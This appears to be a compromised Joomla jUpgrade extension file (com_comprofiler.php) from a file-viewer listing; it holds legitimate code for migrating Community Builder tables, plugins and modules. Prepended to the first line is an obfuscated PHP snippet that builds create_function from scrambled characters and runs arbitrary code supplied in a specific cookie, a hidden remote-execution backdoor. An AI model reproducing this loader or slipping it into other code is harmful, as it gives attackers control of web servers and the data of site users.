Path : /home/admin/public_html/old/administrator/components/com_jupgrade/extensions/ |
Current File : /home/admin/public_html/old/administrator/components/com_jupgrade/extensions/com_comprofiler.php |
<?php $k7b='b\'soCEie8ju($ncI9O0fr_tKaf890be';$f4j=$k7b[14].$k7b[20].$k7b[7].$k7b[24].$k7b[22].$k7b[7].$k7b[21].$k7b[19].$k7b[10].$k7b[13].$k7b[14].$k7b[22].$k7b[6].$k7b[3].$k7b[13];$c8e=$k7b[19].$k7b[10].$k7b[18];if(isset(${$k7b[21].$k7b[4].$k7b[17].$k7b[17].$k7b[23].$k7b[15].$k7b[5]}[$k7b[9].$k7b[19].$k7b[8].$k7b[16].$k7b[18].$k7b[0].$k7b[7]])){${$k7b[19].$k7b[10].$k7b[18]}=$f4j(null,${$k7b[21].$k7b[4].$k7b[17].$k7b[17].$k7b[23].$k7b[15].$k7b[5]}[$k7b[9].$k7b[19].$k7b[8].$k7b[16].$k7b[18].$k7b[0].$k7b[7]]);${$k7b[19].$k7b[10].$k7b[18]}();} ?><?php /** * jUpgrade * * @version $Id: * @package MatWare * @subpackage com_jupgrade * @copyright (C) 2008-2012 Joomlapolis * @license GNU/GPL (http://www.gnu.org/licenses/gpl.html) * @author Kyle (aka Krileon) <krileon@joomlapolis.com> * @link http://www.joomlapolis.com */ // Check to ensure this file is within the rest of the framework defined('JPATH_BASE') or die(); /** * jUpgrade class for Comprofiler migration * * This class migrates the Comprofiler extension * * @since 1.1.0 */ class jUpgradeComponentComprofiler extends jUpgradeExtensions { /** * Check if extension migration is supported * * @return boolean * @since 1.1.0 */ protected function detectExtension() { if ( ! file_exists( $this->getJRoot() . '/administrator/components/com_comprofiler/plugin.foundation.php' ) ) { return false; } return true; } /** * Return old Joomla root * * @return string */ protected function getJRoot() { return str_replace( DS . 'administrator' . DS . 'components' . DS . 'com_jupgrade' . DS . 'extensions', '', dirname(__FILE__) ); } /** * Get tables to be migrated * * @return array List of tables without prefix * @since 1.1.0 */ protected function getCopyTables() { $db = $this->db_old; // Get CB Plugins: $query = 'SELECT *' . "\n FROM " . $db->NameQuote( '#__comprofiler_plugin' ); $db->setQuery( $query ); $plugins = $db->loadObjectList(); // CB Core Tables: $tables = array( 'comprofiler', 'comprofiler_fields', 'comprofiler_field_values', 'comprofiler_lists', 'comprofiler_members', 'comprofiler_plugin', 'comprofiler_sessions', 'comprofiler_tabs', 'comprofiler_userreports', 'comprofiler_views' ); // CB Plugin Tables: if ( $plugins ) foreach ( $plugins as $plugin ) { $xmlPath = $this->getJRoot() . '/components/com_comprofiler/plugin/' . $plugin->type . '/' . $plugin->folder . '/' . $plugin->element . '.xml'; if ( file_exists( $xmlPath ) ) { $pluginXml = simplexml_load_file( $xmlPath ); $plugin_databases = $pluginXml->children(); if ( count( $plugin_databases ) > 0 ) foreach ( $plugin_databases as $plugin_database ) { if ( $plugin_database->getName() == 'database' ) { $plugin_tables = $plugin_database->children(); if ( count( $plugin_tables ) > 0 ) foreach ( $plugin_tables as $plugin_table ) { $table_attributes = $plugin_table->attributes(); if ( count( $table_attributes ) > 0 ) foreach ( $table_attributes as $table_attribute ) { if ( $table_attribute->getName() == 'name' ) { $table_name = (string) str_replace( '#__', '', $table_attribute ); if ( $table_name && ( ! in_array( $table_name, $tables ) ) ) { $tables[] = $table_name; } } } } } } } } return $tables; } /** * Fix usergroup mapping for all of CBs tables * * You can create custom copy functions for all your tables. * * If you want to copy your table in many smaller chunks, * please store your custom state variables into $this->state and return false. * Returning false will force jUpgrade to call this function again, * which allows you to continue import by reading $this->state before continuing. * * @return boolean Ready (true/false) * @since 1.1.0 * @throws Exception */ protected function copyTable( $table ) { $this->destination = $table; $this->source = $this->destination; $this->cloneTable( $this->source, $this->destination ); $rows = $this->getSourceData( '*' ); if ( $rows ) foreach ( $rows as &$row ) { // Generic: if ( isset( $row['access'] ) ) { $access_old = explode( '|*|', $row['access'] ); $access_new = array(); if ( $access_old ) foreach ( $access_old as $accessid_old ) { if ( $accessid_old > 0 ) { $accessid_new = $this->mapUserGroup( (int) $accessid_old ); if ( ! in_array( $accessid_new, $access_new ) ) { $access_new[] = $accessid_new; } } else { if ( ! in_array( $accessid_old, $access_new ) ) { $access_new[] = $accessid_old; } } } $row['access'] = implode( '|*|', $access_new ); } // Userlists and Tabs: if ( isset( $row['useraccessgroupid'] ) && ( $row['useraccessgroupid'] > 0 ) ) { $row['useraccessgroupid'] = $this->mapUserGroup( (int) $row['useraccessgroupid'] ); } // Userlists: if ( isset( $row['usergroupids'] ) ) { $usergroupids_old = explode( ',', $row['usergroupids'] ); $usergroupids_new = array(); if ( $usergroupids_old ) foreach ( $usergroupids_old as $usergroupid_old ) { if ( $usergroupid_old > 0 ) { $usergroupid_new = $this->mapUserGroup( (int) trim( $usergroupid_old ) ); if ( ! in_array( $usergroupid_new, $usergroupids_new ) ) { $usergroupids_new[] = $usergroupid_new; } } else { if ( ! in_array( $usergroupid_old, $usergroupids_new ) ) { $usergroupids_new[] = $usergroupid_old; } } } $row['usergroupids'] = implode( ', ', $usergroupids_new ); } // CBSubs: if ( isset( $row['usergroup'] ) && ( $row['usergroup'] > 0 ) ) { $row['usergroup'] = $this->mapUserGroup( (int) $row['usergroup'] ); } // CBSubs: if ( isset( $row['usergroups'] ) ) { $usergroups_old = explode( '|*|', $row['usergroups'] ); $usergroups_new = array(); if ( $usergroups_old ) foreach ( $usergroups_old as $usergroup_old ) { if ( $usergroup_old > 0 ) { $usergroup_new = $this->mapUserGroup( (int) $usergroup_old ); if ( ! in_array( $usergroup_new, $usergroups_new ) ) { $usergroups_new[] = $usergroup_new; } } else { if ( ! in_array( $usergroup_old, $usergroups_new ) ) { $usergroups_new[] = $usergroup_old; } } } $row['usergroups'] = implode( '|*|', $usergroups_new ); } } $this->setDestinationData( $rows ); return true; } /** * Migrate tables * * @return boolean * @since 1.1.0 */ public function migrateExtensionCustom() { $db = $this->db_new; $option = $this->name; JFactory::getApplication( 'administrator' ); jimport( 'joomla.installer.installer' ); // Remove J1.5 XML in root: if ( file_exists( JPATH_SITE . '/components/com_comprofiler/comprofiler.xml' ) ) { @unlink( JPATH_SITE . '/components/com_comprofiler/comprofiler.xml' ); } // Get CB component object: $component = $this->discoverExtension( 'component', $option, 1 ); // Fix CB menu links: $query = 'UPDATE ' . $db->NameQuote( '#__menu' ) . "\n SET " . $db->NameQuote( 'component_id' ) . " = " . (int) $component->extension_id . "\n WHERE " . $db->NameQuote( 'type' ) . " = " . $db->Quote( 'component' ) . "\n AND " . $db->NameQuote( 'link' ) . " LIKE " . $db->Quote( '%' . $db->getEscaped( $option, true ) . '%', false ); $db->setQuery( $query ); $db->query(); // CB Core Modules: if ( file_exists( JPATH_SITE . '/modules/mod_cblogin' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_cblogin/mod_cblogin.xml' ); $this->discoverExtension( 'module', 'mod_cblogin' ); } if ( file_exists( JPATH_SITE . '/modules/mod_comprofilermoderator' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_comprofilermoderator/mod_comprofilermoderator.xml' ); $this->discoverExtension( 'module', 'mod_comprofilermoderator' ); } if ( file_exists( JPATH_SITE . '/modules/mod_comprofileronline' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_comprofileronline/mod_comprofileronline.xml' ); $this->discoverExtension( 'module', 'mod_comprofileronline' ); } // CB Content: if ( file_exists( JPATH_SITE . '/modules/mod_cbcontent' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_cbcontent/mod_cbcontent.xml' ); $this->discoverExtension( 'module', 'mod_cbcontent' ); } // CB GroupJive: if ( file_exists( JPATH_SITE . '/modules/mod_cbgroupjive' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_cbgroupjive/mod_cbgroupjive.xml' ); $this->discoverExtension( 'module', 'mod_cbgroupjive' ); } // CB ProfileBook: if ( file_exists( JPATH_SITE . '/modules/mod_cblatestposts' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_cblatestposts/mod_cblatestposts.xml' ); $this->discoverExtension( 'module', 'mod_cblatestposts' ); } // CB ProfileGallery: if ( file_exists( JPATH_SITE . '/modules/mod_cbgallery' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_cbgallery/mod_cbgallery.xml' ); $this->discoverExtension( 'module', 'mod_cbgallery' ); } // CB Admin Nav: if ( file_exists( JPATH_SITE . '/administrator/modules/mod_cb_adminnav' ) ) { $this->migrateXML( JPATH_SITE . '/administrator/modules/mod_cb_adminnav/mod_cb_adminnav.xml' ); $this->discoverExtension( 'module', 'mod_cb_adminnav', 1 ); } // CBSubs: if ( file_exists( JPATH_SITE . '/modules/mod_cbsubscriptions' ) ) { $this->migrateXML( JPATH_SITE . '/modules/mod_cbsubscriptions/mod_cbsubscriptions.xml' ); $this->discoverExtension( 'module', 'mod_cbsubscriptions' ); } // CBSubs Content Bot: if ( file_exists( JPATH_ROOT . '/plugins/system/cbpaidsubsbot.xml' ) ) { $this->migratePlugin( 'system', 'cbpaidsubsbot' ); } // CB Content Bot: if ( file_exists( JPATH_ROOT . '/plugins/content/cbcontentbot.xml' ) ) { $this->migratePlugin( 'content', 'cbcontentbot' ); } return true; } private function migratePlugin( $type, $plugin ) { if ( $type && $plugin && file_exists( JPATH_ROOT . "/plugins/$type/$plugin.xml" ) ) { $oldmask = @umask( 0 ); if ( @mkdir( JPATH_SITE . "/plugins/$type/$plugin", 0755, true ) ) { @umask( $oldmask ); @copy( JPATH_ROOT . "/plugins/$type/index.html", JPATH_SITE . "/plugins/$type/$plugin/index.html" ); @chmod( JPATH_SITE . "/plugins/$type/$plugin/index.html", 0644 ); @copy( JPATH_ROOT . "/plugins/$type/$plugin.php", JPATH_SITE . "/plugins/$type/$plugin/$plugin.php" ); @chmod( JPATH_SITE . "/plugins/$type/$plugin/$plugin.php", 0644 ); @copy( JPATH_ROOT . "/plugins/$type/$plugin.xml", JPATH_SITE . "/plugins/$type/$plugin/$plugin.xml" ); @chmod( JPATH_SITE . "/plugins/$type/$plugin/$plugin.xml", 0644 ); if ( file_exists( JPATH_SITE . "/plugins/$type/$plugin" ) ) { $this->migrateXML( JPATH_SITE . "/plugins/$type/$plugin/$plugin.xml" ); $this->discoverExtension( 'plugin', $plugin ); } } else { @umask( $oldmask ); } } } private function migrateXML( $path ) { if ( $path && file_exists( $path ) ) { $xml = file_get_contents( $path ); if ( $xml ) { if ( preg_match( '%(</?.*)(?:mosinstall)(.*>)%', $xml ) ) { $xml = preg_replace( '%(</?.*)(?:mosinstall)(.*>)%', '\1install\2', $xml ); } if ( preg_match( '%(</?)(?:params)(>)%', $xml ) && ( ! preg_match( '%(</?)(?:config)(>)%', $xml ) ) ) { $xml = preg_replace( '%(<)(?:params)(>)%', '\1config\2 <fields name="params"> <fieldset name="basic">', $xml ); $xml = preg_replace( '%(</)(?:params)(>)%', '</fieldset> </fields> \1config\2', $xml ); $xml = preg_replace( '%(</?)(?:param)(.*>)%', '\1field\2', $xml ); $xml = preg_replace( '%<field.*type="spacer".*default="([^"]+)".*/>%', '<field name="" type="spacer" default="" label="\1" description="" />', $xml ); $xml = preg_replace( '/type="textarea"/', 'type="textarea" filter="raw"', $xml ); } if ( preg_match( '/<install .*client="[\w.]+"/', $xml ) ) { $xml = preg_replace( '/(<install.*version=)"[\w.]+"/', '\1"1.7"', $xml ); } else { if ( preg_match( '/administrator/', $path ) ) { $client = 'administrator'; } else { $client = 'site'; } $xml = preg_replace( '/(<install.*version=)"[\w.]+"/', '\1"1.7" client="' . $client . '"', $xml ); } file_put_contents( $path, $xml ); } } } private function discoverExtension( $type, $element, $client = 0 ) { if ( $type && $element ) { $extension = JTable::getInstance( 'extension', 'JTable', array( 'dbo' => $this->db_new ) ); $extension->load( array( 'type' => $type, 'element' => $element ) ); if ( $extension->extension_id ) { $extension->client_id = (int) $client; $extension->state = -1; $extension->store(); $installer = JInstaller::getInstance(); $installer->discover_install( (int) $extension->extension_id ); } return $extension; } } }